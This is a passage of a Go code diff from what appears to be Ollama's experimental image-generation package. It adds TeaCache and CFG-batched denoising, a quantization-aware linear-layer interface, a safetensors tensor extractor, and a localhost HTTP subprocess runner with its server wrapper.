cfg.TeaCache = true
if cfg.TeaCacheThreshold <= 0 {
cfg.TeaCacheThreshold = 0.15
}
// Enable fused QKV if requested (only fuse once)
if cfg.FusedQKV && !m.qkvFused {
m.Transformer.FuseAllQKV()
m.qkvFused = true
fmt.Println(" Fused QKV enabled")
}
useCFG := cfg.NegativePrompt != ""
@@ -238,20 +267,71 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
mlx.Eval(ropeCache.UnifiedCos)
}
// Step cache for shallow layer reuse (DeepCache/Learning-to-Cache style)
var stepCache *cache.StepCache
if cfg.LayerCache {
stepCache = cache.NewStepCache(cfg.CacheLayers)
fmt.Printf(" Layer caching enabled: %d layers, refresh every %d steps\n",
cfg.CacheLayers, cfg.CacheInterval)
// Pre-compute batched embeddings for CFG (outside the loop for efficiency)
var batchedEmb *mlx.Array
if useCFG {
// Concatenate embeddings once: [1, L, D] + [1, L, D] -> [2, L, D]
batchedEmb = mlx.Concatenate([]*mlx.Array{posEmb, negEmb}, 0)
mlx.Keep(batchedEmb)
mlx.Eval(batchedEmb)
}
// TeaCache for timestep-aware caching
// For CFG mode, we cache pos/neg separately, skip early steps, and always compute CFG fresh
var teaCache *cache.TeaCache
if cfg.TeaCache {
skipEarly := 0
if useCFG {
skipEarly = 3 // Skip first 3 steps for CFG to preserve structure
}
teaCache = cache.NewTeaCache(&cache.TeaCacheConfig{
Threshold: cfg.TeaCacheThreshold,
RescaleFactor: 1.0,
SkipEarlySteps: skipEarly,
})
if useCFG {
fmt.Printf(" TeaCache enabled (CFG mode): threshold=%.2f, skip first %d steps\n", cfg.TeaCacheThreshold, skipEarly)
} else {
fmt.Printf(" TeaCache enabled: threshold=%.2f\n", cfg.TeaCacheThreshold)
}
}
// cleanup frees all kept arrays when we need to abort early
cleanup := func() {
posEmb.Free()
if negEmb != nil {
negEmb.Free()
}
ropeCache.ImgCos.Free()
ropeCache.ImgSin.Free()
ropeCache.CapCos.Free()
ropeCache.CapSin.Free()
ropeCache.UnifiedCos.Free()
ropeCache.UnifiedSin.Free()
if batchedEmb != nil {
batchedEmb.Free()
}
if teaCache != nil {
teaCache.Free()
}
latents.Free()
}
// Denoising loop
if cfg.Progress != nil {
cfg.Progress(0, cfg.Steps) // Start at 0%
}
for i := 0; i < cfg.Steps; i++ {
stepStart := time.Now()
if cfg.Progress != nil {
cfg.Progress(i+1, cfg.Steps)
// Check for cancellation
if ctx != nil {
select {
case <-ctx.Done():
cleanup()
return nil, ctx.Err()
default:
}
}
stepStart := time.Now()
// GPU capture on step 2 if requested
if cfg.CapturePath != "" && i == 1 {
@@ -259,49 +339,77 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
}
tCurr := scheduler.Timesteps[i]
timestep := mlx.ToBFloat16(mlx.NewArray([]float32{1.0 - tCurr}, []int32{1}))
var noisePred *mlx.Array
patches := PatchifyLatents(latents, tcfg.PatchSize)
// TeaCache: check if we should compute or reuse cached output
shouldCompute := teaCache == nil || teaCache.ShouldCompute(i, tCurr)
var output *mlx.Array
if stepCache != nil {
// Use layer caching for faster inference
if shouldCompute {
timestep := mlx.ToBFloat16(mlx.NewArray([]float32{1.0 - tCurr}, []int32{1}))
patches := PatchifyLatents(latents, tcfg.PatchSize)
var output *mlx.Array
if useCFG {
posOutput := m.Transformer.ForwardWithCache(patches, timestep, posEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
// Note: CFG with layer cache shares the cache between pos/neg
// This is approximate but fast - neg prompt uses same cached shallow layers
negOutput := m.Transformer.ForwardWithCache(patches, timestep, negEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
diff := mlx.Sub(posOutput, negOutput)
// CFG Batching: single forward pass with batch=2
// Tile patches: [1, L, D] -> [2, L, D]
batchedPatches := mlx.Tile(patches, []int32{2, 1, 1})
// Tile timestep: [1] -> [2]
batchedTimestep := mlx.Tile(timestep, []int32{2})
// Single batched forward pass (RoPE broadcasts from [1,L,H,D] to [2,L,H,D])
batchedOutput := m.Transformer.Forward(batchedPatches, batchedTimestep, batchedEmb, ropeCache)
// Split output: [2, L, D] -> pos [1, L, D], neg [1, L, D]
outputShape := batchedOutput.Shape()
L := outputShape[1]
D := outputShape[2]
posOutput := mlx.Slice(batchedOutput, []int32{0, 0, 0}, []int32{1, L, D})
negOutput := mlx.Slice(batchedOutput, []int32{1, 0, 0}, []int32{2, L, D})
// Convert to noise predictions (unpatchify and negate)
posPred := UnpatchifyLatents(posOutput, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
posPred = mlx.Neg(posPred)
negPred := UnpatchifyLatents(negOutput, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
negPred = mlx.Neg(negPred)
// Cache pos/neg separately for TeaCache
if teaCache != nil {
teaCache.UpdateCFGCache(posPred, negPred, tCurr)
mlx.Keep(teaCache.Arrays()...)
}
// Apply CFG: noisePred = neg + scale * (pos - neg)
diff := mlx.Sub(posPred, negPred)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
output = mlx.Add(negOutput, scaledDiff)
} else {
output = m.Transformer.ForwardWithCache(patches, timestep, posEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
}
} else {
// Standard forward without caching
if useCFG {
posOutput := m.Transformer.Forward(patches, timestep, posEmb, ropeCache)
negOutput := m.Transformer.Forward(patches, timestep, negEmb, ropeCache)
diff := mlx.Sub(posOutput, negOutput)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
output = mlx.Add(negOutput, scaledDiff)
noisePred = mlx.Add(negPred, scaledDiff)
} else {
// Non-CFG forward pass
output = m.Transformer.Forward(patches, timestep, posEmb, ropeCache)
noisePred = UnpatchifyLatents(output, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
noisePred = mlx.Neg(noisePred)
// Update TeaCache
if teaCache != nil {
teaCache.UpdateCache(noisePred, tCurr)
mlx.Keep(teaCache.Arrays()...)
}
}
} else if useCFG && teaCache != nil && teaCache.HasCFGCache() {
// CFG mode: get cached pos/neg and compute CFG fresh
posPred, negPred := teaCache.GetCFGCached()
diff := mlx.Sub(posPred, negPred)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
noisePred = mlx.Add(negPred, scaledDiff)
fmt.Printf(" [TeaCache: reusing cached pos/neg outputs]\n")
} else {
// Non-CFG mode: reuse cached noise prediction
noisePred = teaCache.GetCached()
fmt.Printf(" [TeaCache: reusing cached output]\n")
}
noisePred := UnpatchifyLatents(output, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
noisePred = mlx.Neg(noisePred)
oldLatents := latents
latents = scheduler.Step(noisePred, latents, i)
// Keep latents and any cached arrays
if stepCache != nil {
mlx.Keep(stepCache.Arrays()...)
}
mlx.Eval(latents)
oldLatents.Free()
@@ -313,6 +421,10 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
peakMem := float64(mlx.MetalGetPeakMemory()) / (1024 * 1024 * 1024)
fmt.Printf(" Step %d/%d: t=%.4f (%.2fs) [%.1f GB active, %.1f GB peak]\n",
i+1, cfg.Steps, tCurr, time.Since(stepStart).Seconds(), activeMem, peakMem)
if cfg.Progress != nil {
cfg.Progress(i+1, cfg.Steps) // Report completed step
}
}
// Free denoising temporaries before VAE decode
@@ -326,8 +438,14 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
ropeCache.CapSin.Free()
ropeCache.UnifiedCos.Free()
ropeCache.UnifiedSin.Free()
if stepCache != nil {
stepCache.Free()
if batchedEmb != nil {
batchedEmb.Free()
}
if teaCache != nil {
hits, misses := teaCache.Stats()
fmt.Printf(" TeaCache stats: %d hits, %d misses (%.1f%% cache rate)\n",
hits, misses, float64(hits)/float64(hits+misses)*100)
teaCache.Free()
}
// VAE decode

View File

@@ -10,6 +10,13 @@ type Layer interface {
Forward(x *mlx.Array) *mlx.Array
}
// LinearLayer is an interface for linear layers (both regular and quantized).
// This allows swapping between Linear and QuantizedLinear at runtime.
type LinearLayer interface {
Forward(x *mlx.Array) *mlx.Array
OutputDim() int32 // Returns the output dimension of the layer
}
// Linear applies an affine transformation: y = x @ W.T + b
// Weight is stored as [out_features, in_features], matching PyTorch/MLX convention.
type Linear struct {
@@ -49,6 +56,11 @@ func (l *Linear) Forward(x *mlx.Array) *mlx.Array {
return mlx.Linear(x, w)
}
// OutputDim returns the output dimension of the linear layer.
func (l *Linear) OutputDim() int32 {
return l.Weight.Shape()[0]
}
// ToQuantized converts this Linear to a QuantizedLinear.
func (l *Linear) ToQuantized(groupSize, bits int, mode string) *QuantizedLinear {
qw, scales, qbiases := mlx.Quantize(l.Weight, groupSize, bits, mode)
@@ -84,6 +96,13 @@ func (ql *QuantizedLinear) Forward(x *mlx.Array) *mlx.Array {
return out
}
// OutputDim returns the output dimension of the quantized linear layer.
// For mxfp8/mxfp4, quantized weight shape is [out_features, in_features / group_size].
// The output dimension is the first dimension of the weight.
func (ql *QuantizedLinear) OutputDim() int32 {
return ql.Weight.Shape()[0]
}
// RMSNorm represents an RMS normalization layer.
type RMSNorm struct {
Weight *mlx.Array `weight:"weight"`

210
x/imagegen/runner/runner.go Normal file
View File

@@ -0,0 +1,210 @@
//go:build mlx
// Package runner provides a subprocess server for image generation.
// It listens on a port and handles HTTP requests for image generation.
package runner
import (
"context"
"encoding/json"
"flag"
"fmt"
"log/slog"
"net/http"
"os"
"os/signal"
"sync"
"syscall"
"time"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/models/zimage"
)
// Request is the image generation request format
type Request struct {
Prompt string `json:"prompt"`
Width int32 `json:"width,omitempty"`
Height int32 `json:"height,omitempty"`
Steps int `json:"steps,omitempty"`
Seed int64 `json:"seed,omitempty"`
}
// Response is streamed back for each progress update
type Response struct {
Content string `json:"content,omitempty"`
Image string `json:"image,omitempty"` // Base64-encoded PNG
Done bool `json:"done"`
}
// Server holds the model and handles requests
type Server struct {
mu sync.Mutex
model *zimage.Model
modelName string
}
// Execute is the entry point for the image runner subprocess
func Execute(args []string) error {
fs := flag.NewFlagSet("image-runner", flag.ExitOnError)
modelName := fs.String("model", "", "path to image model")
port := fs.Int("port", 0, "port to listen on")
if err := fs.Parse(args); err != nil {
return err
}
if *modelName == "" {
return fmt.Errorf("--model is required")
}
if *port == 0 {
return fmt.Errorf("--port is required")
}
slog.Info("starting image runner", "model", *modelName, "port", *port)
// Check memory requirements before loading
requiredMemory := imagegen.EstimateVRAM(*modelName)
availableMemory := mlx.GetMemoryLimit()
if availableMemory > 0 && availableMemory < requiredMemory {
return fmt.Errorf("insufficient memory for image generation: need %d GB, have %d GB",
requiredMemory/(1024*1024*1024), availableMemory/(1024*1024*1024))
}
// Load model
model := &zimage.Model{}
if err := model.Load(*modelName); err != nil {
return fmt.Errorf("failed to load model: %w", err)
}
server := &Server{
model: model,
modelName: *modelName,
}
// Set up HTTP handlers
mux := http.NewServeMux()
mux.HandleFunc("/health", server.healthHandler)
mux.HandleFunc("/completion", server.completionHandler)
httpServer := &http.Server{
Addr: fmt.Sprintf("127.0.0.1:%d", *port),
Handler: mux,
}
// Handle shutdown
done := make(chan struct{})
go func() {
sigCh := make(chan os.Signal, 1)
signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
<-sigCh
slog.Info("shutting down image runner")
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
httpServer.Shutdown(ctx)
close(done)
}()
slog.Info("image runner listening", "addr", httpServer.Addr)
if err := httpServer.ListenAndServe(); err != http.ErrServerClosed {
return err
}
<-done
return nil
}
func (s *Server) healthHandler(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
json.NewEncoder(w).Encode(map[string]string{"status": "ok"})
}
func (s *Server) completionHandler(w http.ResponseWriter, r *http.Request) {
if r.Method != http.MethodPost {
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
return
}
var req Request
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
// Serialize generation requests - MLX model may not handle concurrent generation
s.mu.Lock()
defer s.mu.Unlock()
// Model applies its own defaults for width/height/steps
// Only seed needs to be set here if not provided
if req.Seed <= 0 {
req.Seed = time.Now().UnixNano()
}
// Set up streaming response
w.Header().Set("Content-Type", "application/x-ndjson")
w.Header().Set("Transfer-Encoding", "chunked")
flusher, ok := w.(http.Flusher)
if !ok {
http.Error(w, "streaming not supported", http.StatusInternalServerError)
return
}
// Generate image
ctx := r.Context()
img, err := s.model.GenerateFromConfig(ctx, &zimage.GenerateConfig{
Prompt: req.Prompt,
Width: req.Width,
Height: req.Height,
Steps: req.Steps,
Seed: req.Seed,
Progress: func(step, total int) {
resp := Response{
Content: fmt.Sprintf("\rGenerating: step %d/%d", step, total),
Done: false,
}
data, _ := json.Marshal(resp)
w.Write(data)
w.Write([]byte("\n"))
flusher.Flush()
},
})
if err != nil {
// Don't send error for cancellation
if ctx.Err() != nil {
return
}
resp := Response{Content: fmt.Sprintf("error: %v", err), Done: true}
data, _ := json.Marshal(resp)
w.Write(data)
w.Write([]byte("\n"))
return
}
// Encode image as base64 PNG
imageData, err := imagegen.EncodeImageBase64(img)
if err != nil {
resp := Response{Content: fmt.Sprintf("error encoding: %v", err), Done: true}
data, _ := json.Marshal(resp)
w.Write(data)
w.Write([]byte("\n"))
return
}
// Free the generated image array and clean up MLX state
img.Free()
mlx.ClearCache()
mlx.MetalResetPeakMemory()
// Send final response with image data
resp := Response{
Image: imageData,
Done: true,
}
data, _ := json.Marshal(resp)
w.Write(data)
w.Write([]byte("\n"))
flusher.Flush()
}

View File

@@ -0,0 +1,10 @@
//go:build !mlx
package runner
import "errors"
// Execute returns an error when not built with MLX support.
func Execute(args []string) error {
return errors.New("image generation not available: build with mlx tag")
}

View File

@@ -0,0 +1,176 @@
package safetensors
import (
"bytes"
"encoding/binary"
"encoding/json"
"fmt"
"io"
"os"
"sort"
)
// tensorInfo holds tensor metadata from safetensors headers.
// This avoids depending on safetensors.go which requires the mlx tag.
type tensorInfo struct {
Dtype string `json:"dtype"`
Shape []int32 `json:"shape"`
DataOffsets [2]int `json:"data_offsets"`
}
// TensorExtractor extracts individual tensors from a safetensors file.
// It provides io.Reader interfaces for each tensor's raw data, enabling
// streaming writes to blobs without loading entire tensors into memory.
type TensorExtractor struct {
file *os.File
dataOffset int64 // Start of tensor data region
header map[string]tensorInfo
}
// TensorData holds tensor metadata and a reader for its raw bytes.
type TensorData struct {
Name string
Dtype string
Shape []int32
Size int64
reader *io.SectionReader
}
// Reader returns an io.Reader for the tensor's raw bytes.
func (td *TensorData) Reader() io.Reader {
return td.reader
}
// SafetensorsReader returns a reader that outputs the tensor wrapped in
// minimal safetensors format. This allows using mlx_load_safetensors on
// individual tensor blobs for native zero-copy loading.
func (td *TensorData) SafetensorsReader() io.Reader {
// Build minimal safetensors header with tensor named "data"
header := map[string]tensorInfo{
"data": {
Dtype: td.Dtype,
Shape: td.Shape,
DataOffsets: [2]int{0, int(td.Size)},
},
}
headerJSON, _ := json.Marshal(header)
// Pad header to 8-byte alignment
padding := (8 - len(headerJSON)%8) % 8
headerJSON = append(headerJSON, bytes.Repeat([]byte(" "), padding)...)
// Build header with size prefix
headerBuf := new(bytes.Buffer)
binary.Write(headerBuf, binary.LittleEndian, uint64(len(headerJSON)))
headerBuf.Write(headerJSON)
// Return multi-reader: header + tensor data
td.reader.Seek(0, io.SeekStart)
return io.MultiReader(headerBuf, td.reader)
}
// SafetensorsSize returns the total size of the safetensors-wrapped tensor.
func (td *TensorData) SafetensorsSize() int64 {
header := map[string]tensorInfo{
"data": {
Dtype: td.Dtype,
Shape: td.Shape,
DataOffsets: [2]int{0, int(td.Size)},
},
}
headerJSON, _ := json.Marshal(header)
padding := (8 - len(headerJSON)%8) % 8
return 8 + int64(len(headerJSON)) + int64(padding) + td.Size
}
// OpenForExtraction opens a safetensors file for tensor extraction.
// The caller must call Close() when done.
func OpenForExtraction(path string) (*TensorExtractor, error) {
f, err := os.Open(path)
if err != nil {
return nil, fmt.Errorf("failed to open file: %w", err)
}
var headerSize uint64
if err := binary.Read(f, binary.LittleEndian, &headerSize); err != nil {
f.Close()
return nil, fmt.Errorf("failed to read header size: %w", err)
}
headerBytes := make([]byte, headerSize)
if _, err := f.Read(headerBytes); err != nil {
f.Close()
return nil, fmt.Errorf("failed to read header: %w", err)
}
var header map[string]tensorInfo
if err := json.Unmarshal(headerBytes, &header); err != nil {
f.Close()
return nil, fmt.Errorf("failed to parse header: %w", err)
}
delete(header, "__metadata__")
return &TensorExtractor{
file: f,
dataOffset: 8 + int64(headerSize), // 8 bytes for header size + header content
header: header,
}, nil
}
// GetTensor returns tensor metadata and a reader for extracting a single tensor.
func (te *TensorExtractor) GetTensor(name string) (*TensorData, error) {
info, ok := te.header[name]
if !ok {
return nil, fmt.Errorf("tensor %q not found", name)
}
start := te.dataOffset + int64(info.DataOffsets[0])
size := int64(info.DataOffsets[1] - info.DataOffsets[0])
return &TensorData{
Name: name,
Dtype: info.Dtype,
Shape: info.Shape,
Size: size,
reader: io.NewSectionReader(te.file, start, size),
}, nil
}
// ListTensors returns all tensor names in sorted order.
func (te *TensorExtractor) ListTensors() []string {
names := make([]string, 0, len(te.header))
for name := range te.header {
names = append(names, name)
}
sort.Strings(names)
return names
}
// TensorCount returns the number of tensors in the file.
func (te *TensorExtractor) TensorCount() int {
return len(te.header)
}
// Close closes the underlying file.
func (te *TensorExtractor) Close() error {
return te.file.Close()
}
// ExtractAll returns TensorData for all tensors in the file.
// Each TensorData has a reader that reads from the original file.
// The caller must call Close() on the TensorExtractor when done.
func (te *TensorExtractor) ExtractAll() ([]*TensorData, error) {
names := te.ListTensors()
tensors := make([]*TensorData, 0, len(names))
for _, name := range names {
td, err := te.GetTensor(name)
if err != nil {
return nil, err
}
tensors = append(tensors, td)
}
return tensors, nil
}

View File

@@ -8,8 +8,17 @@ import (
"strings"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
)
// WeightSource is an interface for loading weights.
// Both ModelWeights (directory-based) and ManifestWeights (blob-based) implement this.
type WeightSource interface {
GetTensor(name string) (*mlx.Array, error)
ListTensors() []string
HasTensor(name string) bool
}
// LoadModule loads weights into a struct using reflection and struct tags.
//
// Struct tags use the format: `weight:"path[,optional]"`
@@ -31,7 +40,7 @@ import (
// }
//
// err := LoadModule(&attn, weights, "model.layers.0")
func LoadModule(dst any, weights *ModelWeights, prefix string) error {
func LoadModule(dst any, weights WeightSource, prefix string) error {
v := reflect.ValueOf(dst)
if v.Kind() != reflect.Ptr || v.IsNil() {
return fmt.Errorf("LoadModule: dst must be a non-nil pointer")
@@ -51,7 +60,7 @@ func LoadModule(dst any, weights *ModelWeights, prefix string) error {
}
// loadStruct recursively loads weights into a struct value.
func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string, parentOptional bool) {
func loadStruct(v reflect.Value, weights WeightSource, prefix string, errs *[]string, parentOptional bool) {
t := v.Type()
for i := 0; i < t.NumField(); i++ {
@@ -94,6 +103,22 @@ func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]s
}
}
// Handle nn.LinearLayer interface fields specially
if field.Type == reflect.TypeOf((*nn.LinearLayer)(nil)).Elem() {
if !hasTag {
continue // no tag = skip
}
layer, err := LoadLinearLayer(weights, fullPath)
if err != nil {
if !optional {
*errs = append(*errs, fullPath+": "+err.Error())
}
continue
}
fieldVal.Set(reflect.ValueOf(layer))
continue
}
// Handle by kind
switch fieldVal.Kind() {
case reflect.Ptr:
@@ -136,7 +161,7 @@ func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]s
}
// hasWeightsWithPrefix checks if any weights exist with the given prefix.
func hasWeightsWithPrefix(weights *ModelWeights, prefix string) bool {
func hasWeightsWithPrefix(weights WeightSource, prefix string) bool {
for _, name := range weights.ListTensors() {
if strings.HasPrefix(name, prefix+".") || name == prefix {
return true
@@ -146,7 +171,7 @@ func hasWeightsWithPrefix(weights *ModelWeights, prefix string) bool {
}
// loadSlice loads weights into each element of a slice of struct pointers.
func loadSlice(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string) {
func loadSlice(v reflect.Value, weights WeightSource, prefix string, errs *[]string) {
elemStructType := v.Type().Elem().Elem()
for i := 0; i < v.Len(); i++ {
@@ -168,3 +193,64 @@ func joinPath(prefix, suffix string) string {
}
return prefix + "." + suffix
}
// LoadLinearLayer loads a linear layer from weights, automatically detecting if it's quantized.
// If {path}.weight_scale exists, dequantizes the weights.
func LoadLinearLayer(weights WeightSource, path string) (nn.LinearLayer, error) {
// Check if this is a quantized layer by looking for scale tensor
scalePath := path + ".weight_scale"
if weights.HasTensor(scalePath) {
weight, err := weights.GetTensor(path + ".weight")
if err != nil {
return nil, fmt.Errorf("failed to load quantized weight %s: %w", path, err)
}
scales, err := weights.GetTensor(scalePath)
if err != nil {
return nil, fmt.Errorf("failed to load scales %s: %w", scalePath, err)
}
// Bias is optional
var bias *mlx.Array
biasPath := path + ".bias"
if weights.HasTensor(biasPath) {
bias, _ = weights.GetTensor(biasPath)
}
var qbiases *mlx.Array
qbiasPath := path + ".weight_qbias"
if weights.HasTensor(qbiasPath) {
qbiases, _ = weights.GetTensor(qbiasPath)
}
if mlx.MetalIsAvailable() {
return &nn.QuantizedLinear{
Weight: weight,
Scales: scales,
QBiases: qbiases,
Bias: bias,
GroupSize: 32,
Bits: 8,
Mode: "affine",
}, nil
}
dequantized := mlx.Dequantize(weight, scales, qbiases, 32, 8, "affine")
return nn.NewLinear(dequantized, bias), nil
}
// Load as regular Linear
weight, err := weights.GetTensor(path + ".weight")
if err != nil {
return nil, fmt.Errorf("failed to load weight %s: %w", path, err)
}
// Bias is optional
var bias *mlx.Array
biasPath := path + ".bias"
if weights.HasTensor(biasPath) {
bias, _ = weights.GetTensor(biasPath)
}
return nn.NewLinear(weight, bias), nil
}

View File

@@ -118,6 +118,34 @@ func LoadModelWeights(dir string) (*ModelWeights, error) {
return mw, nil
}
// LoadModelWeightsFromPaths loads weights from specific safetensor file paths.
// Used for loading from blob storage where files are not in a directory.
func LoadModelWeightsFromPaths(paths []string) (*ModelWeights, error) {
mw := &ModelWeights{
tensorFiles: make(map[string]string),
tensorInfo: make(map[string]TensorInfo),
nativeCache: make(map[string]*mlx.SafetensorsFile),
}
for _, path := range paths {
header, err := parseSafetensorHeader(path)
if err != nil {
return nil, fmt.Errorf("failed to parse %s: %w", path, err)
}
for name, info := range header {
mw.tensorFiles[name] = path
mw.tensorInfo[name] = info
}
}
if len(mw.tensorFiles) == 0 {
return nil, fmt.Errorf("no tensors found in provided paths")
}
return mw, nil
}
// Load loads all tensors into cache with the specified dtype.
// If dtype is 0, tensors are loaded in their original dtype.
// Automatically uses streaming (memory-efficient) when dtype conversion is needed,

369
x/imagegen/server.go Normal file
View File

@@ -0,0 +1,369 @@
package imagegen
import (
"bufio"
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"log/slog"
"math/rand"
"net"
"net/http"
"os"
"os/exec"
"path/filepath"
"runtime"
"strconv"
"strings"
"sync"
"time"
"github.com/ollama/ollama/llm"
"github.com/ollama/ollama/ml"
)
// Server wraps an image generation subprocess to implement llm.LlamaServer.
//
// This implementation is compatible with Ollama's scheduler and can be loaded/unloaded
// like any other model. The plan is to eventually bring this into the llm/ package
// and evolve llm/ to support MLX and multimodal models. For now, keeping the code
// separate allows for independent iteration on image generation support.
type Server struct {
mu sync.Mutex
cmd *exec.Cmd
port int
modelName string
vramSize uint64
done chan error
client *http.Client
lastErr string // Last stderr line for error reporting
lastErrLock sync.Mutex
}
// NewServer spawns a new image generation subprocess and waits until it's ready.
func NewServer(modelName string) (*Server, error) {
// Validate platform support before attempting to start
if err := CheckPlatformSupport(); err != nil {
return nil, err
}
// Find a free port
port := 0
if a, err := net.ResolveTCPAddr("tcp", "localhost:0"); err == nil {
if l, err := net.ListenTCP("tcp", a); err == nil {
port = l.Addr().(*net.TCPAddr).Port
l.Close()
}
}
if port == 0 {
port = rand.Intn(65535-49152) + 49152
}
// Get the ollama-mlx executable path (in same directory as current executable)
exe, err := os.Executable()
if err != nil {
return nil, fmt.Errorf("unable to lookup executable path: %w", err)
}
if eval, err := filepath.EvalSymlinks(exe); err == nil {
exe = eval
}
mlxExe := filepath.Join(filepath.Dir(exe), "ollama-mlx")
// Spawn subprocess: ollama-mlx runner --image-engine --model <path> --port <port>
cmd := exec.Command(mlxExe, "runner", "--image-engine", "--model", modelName, "--port", strconv.Itoa(port))
cmd.Env = os.Environ()
// On Linux, set LD_LIBRARY_PATH to include MLX library directories
if runtime.GOOS == "linux" {
// Build library paths: start with LibOllamaPath, then add any mlx_* subdirectories
libraryPaths := []string{ml.LibOllamaPath}
if mlxDirs, err := filepath.Glob(filepath.Join(ml.LibOllamaPath, "mlx_*")); err == nil {
libraryPaths = append(libraryPaths, mlxDirs...)
}
// Append existing LD_LIBRARY_PATH if set
if existingPath, ok := os.LookupEnv("LD_LIBRARY_PATH"); ok {
libraryPaths = append(libraryPaths, filepath.SplitList(existingPath)...)
}
pathEnvVal := strings.Join(libraryPaths, string(filepath.ListSeparator))
// Update or add LD_LIBRARY_PATH in cmd.Env
found := false
for i := range cmd.Env {
if strings.HasPrefix(cmd.Env[i], "LD_LIBRARY_PATH=") {
cmd.Env[i] = "LD_LIBRARY_PATH=" + pathEnvVal
found = true
break
}
}
if !found {
cmd.Env = append(cmd.Env, "LD_LIBRARY_PATH="+pathEnvVal)
}
slog.Debug("mlx subprocess library path", "LD_LIBRARY_PATH", pathEnvVal)
}
s := &Server{
cmd: cmd,
port: port,
modelName: modelName,
vramSize: EstimateVRAM(modelName),
done: make(chan error, 1),
client: &http.Client{Timeout: 10 * time.Minute},
}
// Forward subprocess stdout/stderr to server logs
stdout, _ := cmd.StdoutPipe()
stderr, _ := cmd.StderrPipe()
go func() {
scanner := bufio.NewScanner(stdout)
for scanner.Scan() {
slog.Info("image-runner", "msg", scanner.Text())
}
}()
go func() {
scanner := bufio.NewScanner(stderr)
for scanner.Scan() {
line := scanner.Text()
slog.Warn("image-runner", "msg", line)
s.lastErrLock.Lock()
s.lastErr = line
s.lastErrLock.Unlock()
}
}()
slog.Info("starting ollama-mlx image runner subprocess", "exe", mlxExe, "model", modelName, "port", port)
if err := cmd.Start(); err != nil {
return nil, fmt.Errorf("failed to start image runner: %w", err)
}
// Reap subprocess when it exits
go func() {
err := cmd.Wait()
s.done <- err
}()
// Wait for subprocess to be ready
if err := s.waitUntilRunning(); err != nil {
s.Close()
return nil, err
}
return s, nil
}
// ModelPath returns the path to the model.
func (s *Server) ModelPath() string {
return s.modelName
}
func (s *Server) Load(ctx context.Context, systemInfo ml.SystemInfo, gpus []ml.DeviceInfo, requireFull bool) ([]ml.DeviceID, error) {
return nil, nil
}
// Ping checks if the subprocess is healthy.
func (s *Server) Ping(ctx context.Context) error {
url := fmt.Sprintf("http://127.0.0.1:%d/health", s.port)
req, err := http.NewRequestWithContext(ctx, "GET", url, nil)
if err != nil {
return err
}
resp, err := s.client.Do(req)
if err != nil {
return err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return fmt.Errorf("health check failed: %d", resp.StatusCode)
}
return nil
}
// waitUntilRunning waits for the subprocess to be ready.
func (s *Server) waitUntilRunning() error {
ctx := context.Background()
timeout := time.After(2 * time.Minute)
ticker := time.NewTicker(100 * time.Millisecond)
defer ticker.Stop()
for {
select {
case err := <-s.done:
// Include recent stderr lines for better error context
errMsg := s.getLastErr()
if errMsg != "" {
return fmt.Errorf("image runner failed: %s (exit: %v)", errMsg, err)
}
return fmt.Errorf("image runner exited unexpectedly: %w", err)
case <-timeout:
errMsg := s.getLastErr()
if errMsg != "" {
return fmt.Errorf("timeout waiting for image runner: %s", errMsg)
}
return errors.New("timeout waiting for image runner to start")
case <-ticker.C:
if err := s.Ping(ctx); err == nil {
slog.Info("image runner is ready", "port", s.port)
return nil
}
}
}
}
// getLastErr returns the last stderr line.
func (s *Server) getLastErr() string {
s.lastErrLock.Lock()
defer s.lastErrLock.Unlock()
return s.lastErr
}
func (s *Server) WaitUntilRunning(ctx context.Context) error { return nil }
func (s *Server) Completion(ctx context.Context, req llm.CompletionRequest, fn func(llm.CompletionResponse)) error {
seed := req.Seed
if seed == 0 {
seed = time.Now().UnixNano()
}
// Build request for subprocess
creq := struct {
Prompt string `json:"prompt"`
Width int32 `json:"width,omitempty"`
Height int32 `json:"height,omitempty"`
Steps int32 `json:"steps,omitempty"`
Seed int64 `json:"seed,omitempty"`
}{
Prompt: req.Prompt,
Width: req.Width,
Height: req.Height,
Steps: req.Steps,
Seed: seed,
}
body, err := json.Marshal(creq)
if err != nil {
return err
}
url := fmt.Sprintf("http://127.0.0.1:%d/completion", s.port)
httpReq, err := http.NewRequestWithContext(ctx, "POST", url, bytes.NewReader(body))
if err != nil {
return err
}
httpReq.Header.Set("Content-Type", "application/json")
resp, err := s.client.Do(httpReq)
if err != nil {
return err
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return fmt.Errorf("request failed: %d", resp.StatusCode)
}
scanner := bufio.NewScanner(resp.Body)
scanner.Buffer(make([]byte, 1024*1024), 16*1024*1024) // 16MB max
for scanner.Scan() {
// Parse subprocess response (has singular "image" field)
var raw struct {
Image string `json:"image,omitempty"`
Content string `json:"content,omitempty"`
Done bool `json:"done"`
Step int `json:"step,omitempty"`
Total int `json:"total,omitempty"`
}
if err := json.Unmarshal(scanner.Bytes(), &raw); err != nil {
continue
}
// Convert to llm.CompletionResponse
cresp := llm.CompletionResponse{
